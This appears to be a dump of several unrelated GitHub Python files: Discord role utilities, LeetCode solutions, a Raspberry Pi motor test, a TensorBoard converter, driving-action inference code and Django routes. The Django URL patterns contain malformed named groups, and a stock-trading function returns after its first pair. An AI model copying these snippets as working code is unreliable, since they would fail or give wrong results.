{"seq_id":"20395449752","text":"import discord\n\n\nclass Roles:\n    def __init__(self, guild: discord.Guild):\n        self.dg_guild = guild\n        self.staff_role = self.dg_guild.get_role(1054151799516446742) # @・STAFF 0\n        self.support_role = self.dg_guild.get_role(1103969370692141078) # @・Support 1\n        self.control_role = self.dg_guild.get_role(1053766515700273172) # @・Control 2\n        self.moder_role = self.dg_guild.get_role(1053692457625333830) # @・Moderator 3\n        self.curator_role = self.dg_guild.get_role(1019585554016391199) # @・Curator 4\n        self.admin_role = self.dg_guild.get_role(957249264751378492) # @・Administrator 5\n        self.transparent1_role = self.dg_guild.get_role(921729278188597259) # placeholder admin role at the very bottom 6\n        self.heart_role = self.dg_guild.get_role(960642805099810816) # @🤍 7 \n        self.cloud_role = self.dg_guild.get_role(960643635613933661) # @☁️ 8\n        self.raincloud_role = self.dg_guild.get_role(960642444498731108) # @🌩 9\n        self.transparent2_role = self.dg_guild.get_role(937676066066149407) # placeholder admin role under the paperclip 10\n        self.clip_role = self.dg_guild.get_role(980837561335414785) # @🧷 11\n        self.deathgun_role = self.dg_guild.get_role(989882589600948234) # @Death Gun 12\n        \n    def get_all_staff_roles(self):\n        staff_roles_list = [\n            self.staff_role,\n            self.support_role,\n            self.control_role,\n            self.moder_role, \n            self.curator_role,\n            self.admin_role,\n            self.transparent1_role,\n            self.heart_role,\n            self.cloud_role,\n            self.raincloud_role,\n            self.transparent2_role,\n            
self.clip_role,\n self.deathgun_role\n ]\n return staff_roles_list\n \n def roles_check(self, *, member: discord.Member, roles_list: list):\n return [x for x in member.roles if x in roles_list]\n","repo_name":"metamorrphosis/death-gun","sub_path":"utils/staff_roles.py","file_name":"staff_roles.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"810189166","text":"'''Capacity To Ship Packages Within D Days - https://leetcode.com/problems/capacity-to-ship-packages-within-d-days/\n\nA conveyor belt has packages that must be shipped from one port to another within days days.\n\nThe ith package on the conveyor belt has a weight of weights[i]. Each day, we load the ship with packages on the\nconveyor belt (in the order given by weights). We may not load more weight than the maximum weight capacity of the ship.\n\nReturn the least weight capacity of the ship that will result in all the packages on the conveyor belt being shipped\nwithin days days.\n\nExample 1:\n\nInput: weights = [1,2,3,4,5,6,7,8,9,10], days = 5\nOutput: 15\nExplanation: A ship capacity of 15 is the minimum to ship all the packages in 5 days like this:\n1st day: 1, 2, 3, 4, 5\n2nd day: 6, 7\n3rd day: 8\n4th day: 9\n5th day: 10\n\nNote that the cargo must be shipped in the order given, so using a ship of capacity 14 and splitting the packages\ninto parts like (2, 3, 4, 5), (1, 6, 7), (8), (9), (10) is not allowed.\n'''\n\n\nclass Solution:\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n\n def getShipmentCapacity(mid):\n day = 0\n i = 0\n while i < len(weights):\n capacity = mid\n while i < len(weights):\n if capacity < weights[i]:\n break\n else:\n capacity -= weights[i]\n i += 1\n day += 1\n return day\n\n left = max(weights)\n right = sum(weights)\n while left < right:\n mid = left + (right - left) // 2\n shipping_days = getShipmentCapacity(mid)\n if shipping_days <= days:\n right = mid\n else:\n left = mid + 1\n return left","repo_name":"Saima-Chaity/Leetcode","sub_path":"Array_String/Capacity To Ship Packages Within D Days.py","file_name":"Capacity To Ship Packages Within D Days.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30477744560","text":"# Reverse an Array\n\n# Brute Force\ndef reverseArray(arr, n):\n left = 0\n right = n - 1\n while left < right:\n arr[left], arr[right] = arr[right], arr[left]\n left += 1\n right -= 1\n\n return arr\n\n\narr = [1, 2, 3, 4, 5]\nn = len(arr)\nprint(reverseArray(arr, n))\n\n\n\n# Recursive Way\ndef reverseArray(arr, left, right):\n if left >= right:\n return\n arr[left], arr[right] = arr[right], arr[left]\n \n reverseArray(arr, left + 1, right - 1)\n\narr = [1, 2, 3, 4, 5]\nreverseArray(arr, 0, 4)\nprint(arr)","repo_name":"prabhat-gp/GFG","sub_path":"Arrays/Love Babbar/1_reverse_array.py","file_name":"1_reverse_array.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1432999490","text":"import logging\nfrom collections import defaultdict\n\nimport numpy as np\nimport stk\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConstructedAnalyser:\n \"\"\"\n Analyses geometry of building blocks in constructed molecules.\n\n WARNING: This code is only present in the latest versions of stko\n that require Python 3.11!\n\n \"\"\"\n\n def get_building_block_atom_ids(\n 
self,\n        molecule: stk.ConstructedMolecule,\n    ) -> dict[int | None, list[int]]:\n        \"\"\"\n        Get the atom ids of all building blocks.\n\n        Parameters:\n\n            molecule:\n                Molecule to analyse.\n\n        \"\"\"\n\n        atom_ids = defaultdict(list)\n        for atom in molecule.get_atom_infos():\n            if atom.get_building_block_id() is None:\n                continue\n            bb_id = atom.get_building_block_id()\n            atom_ids[bb_id].append(atom.get_atom().get_id())\n        return atom_ids\n\n    def get_building_block_centroids(\n        self,\n        molecule: stk.ConstructedMolecule,\n    ) -> dict[int | None, np.ndarray]:\n        \"\"\"\n        Get the centroids of all building blocks.\n\n        Parameters:\n\n            molecule:\n                Molecule to analyse.\n\n        \"\"\"\n\n        atom_ids = self.get_building_block_atom_ids(molecule)\n        centroids = {\n            i: molecule.get_centroid(atom_ids=atom_ids[i]) for i in atom_ids\n        }\n        return centroids\n","repo_name":"JelfsMaterialsGroup/stko","sub_path":"src/stko/_internal/molecular/constructed/constructed_analysis.py","file_name":"constructed_analysis.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"6"}
{"seq_id":"23101331464","text":"import RPi.GPIO as GPIO\nimport time\n\n# set up raspberry pi pins that are connected to the H-Bridge L298N\n# The motors are wired to the H-Bridge which are plugged in to the corresponding pins on the Pi (7,11,13,15)\n# CAUTION: plugging the motors to the pi will damage it. An H-Bridge or motor controller is needed.\n\n# This tests the robot car by drawing a square: Go straight then turn right 4 times\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(7, GPIO.OUT)\nGPIO.setup(11, GPIO.OUT)\nGPIO.setup(13, GPIO.OUT)\nGPIO.setup(15, GPIO.OUT)\n\nprint(\"get ready\")\n\nfor x in range(0, 4):\n    #both forward\n    GPIO.output(7, True)\n    GPIO.output(13, True)\n    time.sleep(2)\n    \n    #short pause\n    GPIO.output(7, False)\n    GPIO.output(13, False)\n    time.sleep(.2)\n    \n    #sharp turn (pin 7 makes left goes forward, pin 15 makes right goes backward)\n    GPIO.output(7, True)\n    GPIO.output(15, True)\n    time.sleep(.97)\n    \n    # turn off motors\n    GPIO.output(7, False)\n    GPIO.output(15, False)\n\nGPIO.cleanup()\n","repo_name":"megatran/pubnub_iot_tinkering","sub_path":"other_tests/pubnubcar_testrun_square.py","file_name":"pubnubcar_testrun_square.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"28315501041","text":"import argparse\nfrom glob import glob\nimport pandas as pd\nimport progressbar\n\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Convert Tensorboard data to csv')\n    # Common arguments\n    parser.add_argument('--path', type=str, default='data/action_representations_tunnel',\n                        help='the directory with tensorboard logs sorted by seeds')\n\n    args = parser.parse_args()\n\n    path = args.path\n    in_dirs = glob(f\"{path}/seed_*/results/*\")\n    big_df = None\n    big_df_eval = None\n    for in_dir in progressbar.progressbar(in_dirs):\n        seed = int(next(i for i in in_dir.split('/') if i.startswith('seed')).split('_')[1])\n        name = in_dir.split('/')[-1]\n        x = EventAccumulator(in_dir)\n        x.Reload()\n        tags = x.Tags().get('scalars')\n        df = None\n        df_eval = None\n        for tag in tags:\n            col = pd.DataFrame(x.Scalars(tag)).drop(columns=\"wall_time\").rename(columns={'value': tag})\n            if tag.startswith('eval'):\n                if df_eval is None:\n                    df_eval = col\n                else:\n                    df_eval = df_eval.merge(col, 
left_on='step', right_on='step', how='outer')\n            else:\n                if df is None:\n                    df = col\n                else:\n                    df = df.merge(col, left_on='step', right_on='step', how='outer')\n        if df is not None:\n            df.insert(0, 'seed', seed)\n            df.insert(1, 'algorithm', name)\n            if big_df is None:\n                big_df = df\n            else:\n                big_df = big_df.append(df, ignore_index=True)\n        if df_eval is not None:\n            df_eval.insert(0, 'seed', seed)\n            df_eval.insert(1, 'algorithm', name)\n            if big_df_eval is None:\n                big_df_eval = df_eval\n            else:\n                big_df_eval = big_df_eval.append(df_eval, ignore_index=True)\n    if big_df is not None:\n        big_df.to_csv(f'{path}/train.csv', index=False)\n    if big_df_eval is not None:\n        big_df_eval.to_csv(f'{path}/eval.csv', index=False)\n","repo_name":"schobbejak/QMIX-Active-Wake-Control","sub_path":"tensorboard_to_csv.py","file_name":"tensorboard_to_csv.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"1651341408","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom torchvision.utils import save_image\n\npd.options.mode.chained_assignment = None  # default='warn'\n\n\ndef temporal_sampling(frames, start_idx, end_idx, num_samples):\n    \"\"\"\n    Given the start and end frame index, sample num_samples frames between\n    the start and end with equal interval.\n    Args:\n        frames (tensor): a tensor of video frames, dimension is\n            `num video frames` x `channel` x `height` x `width`.\n        start_idx (int): the index of the start frame.\n        end_idx (int): the index of the end frame.\n        num_samples (int): number of frames to sample.\n    Returns:\n        frames (tensor): a tensor of temporally sampled video frames, dimension is\n            `num clip frames` x `channel` x `height` x `width`.\n    \"\"\"\n    index = torch.linspace(start_idx, end_idx, num_samples)\n    index = torch.clamp(index, 0, frames.shape[0] - 1).long().to(\"cuda\")\n    frames = torch.index_select(frames, 0, index)\n    return frames\n\n\n\"\"\"\nPerforms prediction step over all three camera views for a given set or aggregation of frames\n\nparams:\n    cfg: cfg object with hyperparams\n    model and model_2: both are pytorch models, which use the same checkpoint but run on different 
GPUs\n cam_view_clips: dict containing batches of frames for each camera view\n logger: logger object for printing\n resample: whether to resample current temporal interval 1s later than when it starts\n\nreturns:\n two dicts (1 for aggregated frames, 1 for current temporal interval's frames), each containing 3 prob matrices for each camera view\n\"\"\"\ndef predict_cam_views(cfg, model, model_2, cam_view_clips, agg_threshold, logger, resample=False, cur_iter=None):\n all_cam_view_probs = {}\n all_cam_view_probs_2 = {}\n\n for cam_view_type in cam_view_clips.keys():\n if(cam_view_type == \"Dashboard\") and cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"NUM FRAMES AGGREGATED: {cam_view_clips[cam_view_type].shape[0]}\")\n\n # subsample 16 frames from clip agg for each cam angle, then make pred\n if cam_view_clips[cam_view_type].shape[0] == cfg.DATA.NUM_FRAMES:\n input = [cam_view_clips[cam_view_type].permute(1,0,2,3).unsqueeze(dim=0)]\n\n elif cam_view_clips[cam_view_type].shape[0] > cfg.DATA.NUM_FRAMES and resample == False:\n # evenly sample half the num of input frames from among last half of frames in clip aggregation pool\n start_idx_1 = 0 \n end_idx_1 = cam_view_clips[cam_view_type].shape[0] - 1 - cfg.DATA.NUM_FRAMES\n sampled_1 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_1, end_idx_1, int(cfg.DATA.NUM_FRAMES*cfg.TAL.AGG_SAMPLING_RATIO))\n\n SINGLE_PROP_SAMPLING_RATIO = 1.0 - cfg.TAL.AGG_SAMPLING_RATIO\n\n # evenly sample half the num of input frames from last clip (most recently added proposal) in aggregation pool\n start_idx_2 = cam_view_clips[cam_view_type].shape[0] - cfg.DATA.NUM_FRAMES\n end_idx_2 = start_idx_2 + cam_view_clips[cam_view_type].shape[0] - 1\n sampled_2 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_2, end_idx_2, int(cfg.DATA.NUM_FRAMES*SINGLE_PROP_SAMPLING_RATIO))\n\n sampled = torch.cat([sampled_1, sampled_2], dim=0)\n\n # aggregated input\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0)]\n\n # single clip input\n dev = 'cuda:1' if cfg.TAL.USE_2_GPUS == True else 'cuda:0'\n sampled_3 = cam_view_clips[cam_view_type][start_idx_2:]\n input_2 = [sampled_3.permute(1,0,2,3).unsqueeze(dim=0).to(dev)] \n\n cam_view_preds_2 = model_2(input_2).cpu()\n cam_view_probs_2 = cam_view_preds_2.numpy()\n all_cam_view_probs_2[cam_view_type] = cam_view_probs_2\n\n # if cur_iter == 56: #and cur_iter <= 59:\n # save_image(sampled, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_1_no_resample_iter_{cur_iter}.png\")\n # save_image(sampled_3, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_2_no_resample_iter_{cur_iter}.png\")\n\n elif cam_view_clips[cam_view_type].shape[0] > cfg.DATA.NUM_FRAMES and resample == True:\n # assumes uniform sampling of new proposal failed -> resample new proposal but only select frames from 2nd half of clip\n start_idx_1 = 0 \n end_idx_1 = cam_view_clips[cam_view_type].shape[0] - 1 - cfg.DATA.NUM_FRAMES\n sampled_1 = temporal_sampling(cam_view_clips[cam_view_type], start_idx_1, end_idx_1, int(cfg.DATA.NUM_FRAMES*cfg.TAL.AGG_SAMPLING_RATIO))\n\n start_idx_2 = cam_view_clips[cam_view_type].shape[0] - int(cfg.DATA.NUM_FRAMES/2)\n sampled_2 = cam_view_clips[cam_view_type][start_idx_2:]\n\n sampled = torch.cat([sampled_1, sampled_2], dim=0)\n\n # aggregated input\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0)]\n\n # if cur_iter == 56: #and cur_iter <= 59:\n # save_image(sampled, f\"{cfg.PROMPT.IMAGE_FOLDER}/input_1_resampled_iter_{cur_iter}.png\")\n\n cam_view_preds = model(input).cpu()\n cam_view_probs = cam_view_preds.numpy()\n 
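# record this camera view's probabilities from the aggregated-clip prediction\n        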
all_cam_view_probs[cam_view_type] = cam_view_probs\n\n return all_cam_view_probs, all_cam_view_probs_2\n\n\n\"\"\"\nRe-performs predictions over short segment ~6s or less, as a means of strengthening classification confidence\nSpecifically samples frames from overlapping intervals that have not been sampled and predicted on already\n\nparams:\n cfg: cfg object with hyperparams\n model: model to use for this operation\n cam_view_clips: dict containing batches of frames for each camera view\n\nreturns:\n list of dicts (1 for each sampled interval), each containing 3 probability matrices, 1 for each camera view\n\"\"\"\ndef predict_short_segment(cfg, model, cam_view_clips):\n dev = 'cuda:1' if cfg.TAL.USE_2_GPUS == True else 'cuda:0'\n\n all_segment_probs = []\n segment_sample_idxs = []\n # do not include the most recently added frames, they may contain a diff action and low probs\n num_total_frames = cam_view_clips['Dashboard'].shape[0] - cfg.DATA.NUM_FRAMES\n sample_stride = cfg.DATA.NUM_FRAMES//4\n\n for start_idx in range(0, num_total_frames, sample_stride):\n all_cam_view_probs = {}\n end_idx = start_idx + cfg.DATA.NUM_FRAMES\n\n # if start_idx % cfg.DATA.NUM_FRAMES != 0:\n for cam_view_type in cam_view_clips.keys():\n sampled = cam_view_clips[cam_view_type][start_idx:end_idx]\n input = [sampled.permute(1,0,2,3).unsqueeze(dim=0).to(dev)]\n\n cam_view_preds = model(input).cpu()\n cam_view_probs = cam_view_preds.numpy()\n all_cam_view_probs[cam_view_type] = cam_view_probs\n\n all_segment_probs.append(all_cam_view_probs)\n segment_sample_idxs.append(start_idx)\n\n return all_segment_probs, segment_sample_idxs\n\n\n\"\"\"\nGiven proposal prob mats for a single localized action interval and prob mats for the short segment re-evaluation,\nas well as their respective starting frame index, re-order the prob mats according to their temporal boundaries\n\nparams:\n non_overlap_prob_mats: prob matrices accumulated from non-overlap sampling\n overlap_prob_mats: prob matrices obtained from short-seg re-eval (overlap sampling)\n overlap_sample_idxs: idxs corresponding to the first frame of each sampled overlapping interval\n\nreturns:\n list of prob mats, reordered temporal idx\n\"\"\"\ndef get_reordered_prob_mats(cfg, non_overlap_prob_mats, overlap_prob_mats, overlap_sample_idxs):\n # generate start idxs for non-overlapping prob mats\n non_overlap_sample_idxs = [i*cfg.DATA.NUM_FRAMES for i in range(len(non_overlap_prob_mats))]\n sample_idxs = non_overlap_sample_idxs + overlap_sample_idxs\n\n prob_mats = non_overlap_prob_mats + overlap_prob_mats\n\n _, reordered_prob_mats = (list(t) for t in zip(*sorted(zip(sample_idxs, prob_mats))))\n\n return reordered_prob_mats\n\n\n\"\"\"\nGenerates Gaussian weights\n\nparams:\n sigma: sigma term of Gaussian filter\n length: window size (number of samples to consider for filtering)\n\nreturns:\n NParray of Gaussian weights for a window size of 'length'\n\"\"\"\ndef generate_gaussian_weights(sigma, length):\n center = length // 2\n x = np.linspace(-center, center, length)\n kernel = np.exp(-x ** 2 / (2 * sigma ** 2))\n return kernel\n\n\n\"\"\"\nGiven list of prob matrices, computes the Gaussian Weighted Mean matrix\n\"\"\"\ndef apply_gaussian_weights(mats, sigma):\n prob_mats = np.vstack(mats)\n\n weights = generate_gaussian_weights(sigma, len(prob_mats))\n weighted_prob_mats = []\n\n for i, prob_mat in enumerate(prob_mats):\n weighted_prob_mats.append(prob_mat * weights[i])\n\n gaussian_avged_mat = np.sum(weighted_prob_mats, axis=0) / np.sum(weights, axis=0)\n\n 
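# weighted mean over the sampled windows, i.e. np.average(prob_mats, axis=0, weights=weights)\n    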
return gaussian_avged_mat\n\n\n\"\"\"\nRemoves all action intervals that do not repeat consecutively and occur in between two actions of the same type\nClasses which the model is very sensitive to (4, 11, 12) have special filtering conditions to improve classification confidence\n > conditions based on common mistakes model makes\n\"\"\"\ndef filter_noisy_actions(prev_pred, prob_mats, segment_preds):\n idxs_to_filter = []\n\n for i in range(len(prob_mats)):\n if (prev_pred == 4 and np.array(prob_mats[i]).argmax() == 0) or \\\n (prev_pred == 11 and np.array(prob_mats[i]).argmax() == 12) or \\\n (prev_pred == 12 and np.array(prob_mats[i]).argmax() in [4,11]):\n \n idxs_to_filter.append(i)\n\n elif i > 0 and i + 1 < len(prob_mats):\n past = np.array(prob_mats[i-1]).argmax()\n present = np.array(prob_mats[i]).argmax()\n future = np.array(prob_mats[i+1]).argmax()\n\n present_cnt = sum(present == x for x in segment_preds)\n\n if past != present and present != future and past == future and present != prev_pred and present_cnt == 1:\n idxs_to_filter.append(i)\n \n filtered_prob_mats = [prob_mats[j] for j in range(len(prob_mats)) if j not in idxs_to_filter]\n filtered_segment_preds = [segment_preds[j] for j in range(len(prob_mats)) if j not in idxs_to_filter]\n\n return filtered_prob_mats, filtered_segment_preds\n\n\n\"\"\" \nConsolidates multiple action prob matrices by computing the Gaussian weighted average\n\nparams:\n consolidated_prob_mats: a list of prob mats (ordered temporally) for each sampled interval\n sigma: sigma term in Gaussian filtering equation\n filtering_threshold: list of thresholds for each action id for filtering bad probs \n\nreturns:\n final prediction and validity code determined by Gaussian weighted average\n\"\"\"\ndef consolidate_cum_preds_with_gaussian(cfg, consolidated_prob_mats:list, prev_agg_pred, segment_preds, sigma, filtering_thresholds, logger):\n prob_mats, segment_preds = filter_noisy_actions(prev_agg_pred, consolidated_prob_mats, segment_preds)\n\n gaussian_avged_mat = apply_gaussian_weights(prob_mats, sigma)\n\n final_prob = np.max(gaussian_avged_mat)\n final_pred = np.argmax(gaussian_avged_mat)\n\n code = 0\n # check for false positives below threshold or special cases (hints of false positives among high passing probs)\n if final_prob < filtering_thresholds[final_pred] or \\\n (final_pred in [3,6] and any(pred not in [0,3,6] for pred in set(segment_preds))) or \\\n (final_pred in [2,5] and any(pred not in [0,2,5] for pred in set(segment_preds))) or \\\n (final_pred == 4 and len(set(segment_preds)) > 2):\n code = -1\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"mats: {prob_mats}, Gaussian mat: {gaussian_avged_mat}, final prob: {final_prob:.3f}\")\n\n return final_pred, code, final_prob\n\n\"\"\"\nSame as Gaussian method but applies equal weight to all sampled interval probs\n\"\"\"\ndef consolidate_cum_preds_with_mean(cfg, consolidated_prob_mats: list, filtering_thresholds, logger):\n consolidated_prob_mats = np.vstack(consolidated_prob_mats)\n avged_mat = consolidated_prob_mats.mean(axis=0)\n\n final_prob = np.max(avged_mat)\n final_pred = np.argmax(avged_mat)\n\n if final_prob < filtering_thresholds[final_pred]:\n code = -1\n else:\n code = 0\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"mats: {consolidated_prob_mats}, mat: {avged_mat}, final prob: {final_prob:.3f}\")\n\n return final_pred, code\n\n \n\"\"\"\nConsolidates predictions from all camera angles for a single proposal\n\nreturns:\n the final prediction and the code indicating whether it 
is valid (passes threshold) or invalid\n\"\"\"\ndef consolidate_preds(cfg, cam_view_probs:dict, cam_view_weights:dict, filtering_threshold:float, logger):\n consolidated_probs = cam_view_weights['Dashboard'] * cam_view_probs['Dashboard']\\\n + cam_view_weights['Rear_view'] * cam_view_probs['Rear_view']\\\n + cam_view_weights['Right_side_window'] * cam_view_probs['Right_side_window']\n \n consolidated_pred = np.argmax(consolidated_probs)\n consolidated_prob = np.max(consolidated_probs)\n\n consol_code = -1 if consolidated_prob < filtering_threshold else 0\n\n if cfg.TAL.PRINT_DEBUG_OUTPUT: logger.info(f\"AGG pred: {consolidated_pred}, prob: {consolidated_prob:.3f}, code: {consol_code}\")\n\n return consolidated_pred, consol_code, consolidated_probs\n\n\n\"\"\"\nreturns list of tuples (start_row_idx, end_row_idx) for rows of the original df that should be merged into one row\n(start_row_idx, end_row_idx): start and end indices of rows that are consecutive and have the same pred\n\"\"\"\ndef get_merged_segment_idxs(video_df):\n merged_idxs = []\n\n row_idx = 0\n while row_idx < len(video_df):\n # get row pred and then find all other row idxs with same pred\n pred_class = video_df.iloc[[row_idx]][\"pred\"].to_list()[0]\n same_pred_idxs = video_df.index[video_df[\"pred\"] == pred_class].to_list()\n\n # find consecutive row idxs with same pred\n consec_pred_idxs = []\n for i, same_pred_row_idx in enumerate(same_pred_idxs):\n if(same_pred_row_idx >= row_idx):\n consec_pred_idxs.append(same_pred_row_idx)\n\n # fetch future start and current end timestamps\n if i < len(same_pred_idxs) - 1:\n next_interval_start = video_df.iloc[[same_pred_idxs[i+1]]][\"start_time\"].to_list()[0]\n curr_interval_end = video_df.iloc[[same_pred_row_idx]][\"end_time\"].to_list()[0]\n\n if(i == len(same_pred_idxs) - 1 or same_pred_idxs[i+1] - same_pred_row_idx != 1 or \\\n next_interval_start < curr_interval_end or next_interval_start - curr_interval_end > 10):\n row_idx = same_pred_row_idx+1\n break\n\n # assert list of idxs is consec\n assert sorted(consec_pred_idxs) == list(range(min(consec_pred_idxs), max(consec_pred_idxs)+1)), \"Elements not consecutive\"\n\n merged_idxs.append((consec_pred_idxs[0], consec_pred_idxs[-1]))\n\n return merged_idxs\n\n\n\"\"\"\nMerges consecutive temporal intervals with same prediction\n\nparams:\n path_to_txt: path to txt file storing unmerged submission results\n\"\"\"\ndef post_process_merge(path_to_txt, submission_filepath):\n df = pd.read_csv(path_to_txt, sep=\" \", names=['video_id', 'pred', 'start_time', 'end_time', 'prob'])\n\n # get merged idxs\n merged_idxs = get_merged_segment_idxs(df)\n\n for merged_idx_tuple in merged_idxs:\n merge_start_row = df.loc[[merged_idx_tuple[0]]]\n merge_end_row = df.loc[[merged_idx_tuple[1]]]\n\n video_id = merge_start_row[\"video_id\"].to_list()[0]\n activity_id = merge_start_row[\"pred\"].to_list()[0]\n start_time = merge_start_row[\"start_time\"].to_list()[0]\n end_time = merge_end_row[\"end_time\"].to_list()[0]\n mean_prob = df.iloc[merged_idx_tuple[0]:merged_idx_tuple[1]+1]['prob'].mean()\n\n with open(submission_filepath.rpartition('.')[0] + \"_merged.txt\", \"a+\") as f:\n f.writelines(f\"{video_id} {activity_id} {start_time} {end_time} {mean_prob}\\n\")\n\n\n\"\"\"\nParses each video id and elects only 1 action candidate per action id to remain\n\nparams:\n path_to_merged_txt: file path to merged submission file\n bonus_per_sec: score granted per each second of an action interval\n\"\"\"\ndef elect_action_candidates(path_to_merged_txt, 
submission_filepath, bonus_per_sec):\n df = pd.read_csv(path_to_merged_txt, sep=\" \", names=['video_id', 'pred', 'start_time', 'end_time', 'prob'])\n\n for video_id in df[\"video_id\"].unique():\n video_id_df = df.loc[df['video_id'] == video_id]\n\n for action_id in video_id_df['pred'].unique():\n action_id_df = video_id_df.loc[video_id_df['pred'] == action_id]\n\n if action_id_df.shape[0] > 1:\n action_id_df['score'] = action_id_df['prob'] + (action_id_df['end_time'] - action_id_df['start_time']) * bonus_per_sec\n loser_idxs = action_id_df.index[action_id_df['score'] != action_id_df['score'].max()].to_list()\n\n df.drop(loser_idxs,inplace=True)\n\n df.drop('prob', axis=1, inplace=True)\n df.to_csv(submission_filepath, index=False, header=False, sep=' ')\n\n\ndef generate_submission_file(submission_filepath, bonus_per_sec):\n post_process_merge(submission_filepath.rpartition('.')[0] + \"_unmerged.txt\", \n submission_filepath)\n \n elect_action_candidates(submission_filepath.rpartition('.')[0] + \"_merged.txt\", \n submission_filepath, \n bonus_per_sec)\n","repo_name":"CarrotPeeler/WPI-Naturalistic-Driving-Action-Recognition-MQP","sub_path":"slowfast/inference/TAL.py","file_name":"TAL.py","file_ext":"py","file_size_in_byte":17553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15018645429","text":"import pprint\n\nplayer_list = {'Aidan' : {'arrows' : 1, 'bullets' : 23, 'bows' : 1, 'guns' : 4}, 'Thalita' : {'arrows' : 12, 'bullets' : 3, 'bows' : 2, 'guns' : 1}}\n\n\ndef display_inventory(players):\n grand_total = 0\n for name, inventory in players.items():\n total_items = 0\n print('In ' + name + '\\'s inventory, there are:')\n for item in inventory.items():\n print(str(item[1]) + ' ' + str(item[0]))\n total_items += item[1]\n print('Total items = ' + str(total_items))\n grand_total += total_items\n print('The grand total of items in the game is ' + str(grand_total))\n\ndef check_inventory(players, weapon):\n num_of_weapons = 0\n for name, inventory in players.items():\n num_of_weapons += inventory.get(weapon, 0)\n print('Total ' + str(weapon) + ': ' + str(num_of_weapons))\n\n\n\ndisplay_inventory(player_list)\ncheck_inventory(player_list, 'arrows')","repo_name":"redyelruc/BoringStuff","sub_path":"FantasyInventory.py","file_name":"FantasyInventory.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34508766090","text":"\n# https://practice.geeksforgeeks.org/problems/stock-buy-and-sell-1587115621/1/?track=md-arrays&batchId=144\n\n\ndef max_profit(price, start, end):\n\n if end <= start:\n return 0\n \n profit = 0\n\n for i in range(start, end,1):\n\n for j in range(i+1, end+1,1):\n if (price[j] > price[i]):\n \n # Update the current profit\n curr_profit = price[j] - price[i] +\\\n max_profit(price, start, i - 1)+ \\\n max_profit(price, j + 1, end)\n\n # Update the maximum profit so far\n profit = max(profit, curr_profit)\n\n return profit\n\n\ndef stockBuySell(price,n):\n\n if n == 1:\n return 0\n\n i = 0\n while i < n-1:\n\n\n while ((i < (n - 1)) and (price[i + 1] <= price[i])):\n i += 1\n\n if (i == n - 1):\n break\n \n # Store the index of minima\n buy = i\n i += 1\n\n while ((i < n) and (price[i] >= price[i - 1])):\n i += 1\n \n # Store the index of maxima\n sell = i - 1\n \n print(\"Buy on day: \",buy,\"\\t\",\n \"Sell on day: \",sell)\n\n return (buy, sell)\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n price = [100, 
180, 260, 310, 40, 535, 695]\n    n = len(price)\n\n    # print(max_profit(price, 0, n - 1))\n    print(stockBuySell(price, len(price)))\n","repo_name":"ved93/deliberate-practice-challenges","sub_path":"code-everyday-challenge/n191_stocks_sell_buy.py","file_name":"n191_stocks_sell_buy.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"16832326816","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='event_index'),\n    url(r'^events/$', views.index, name='event_index'),\n\n    url(r'^events/(?P[0-9]+)/$', views.event_detail, name='event_detail'),\n    url(r'^events/(?P[0-9]+)/register/$', views.register, name='event_register'),\n\turl(r'^events/create$', views.create, name='event_create'),\n    url(r'^events/(?P[0-9]+)/cancel-register/$', views.cancel_register, name='event_cancel_register'),\n\n    url(r'^user/info/$', views.myinfo, name='myinfo'),\n    url(r'^signin/$', views.signin, name='signin'),\n    url(r'^signup/$', views.signup, name='signup'),\n\turl(r'^signout/$', views.signout, name='signout'),\n\n    url(r'^events/create/$',views.create,name='event_create')\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"yug095/Find-Free-Food","sub_path":"ffx/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
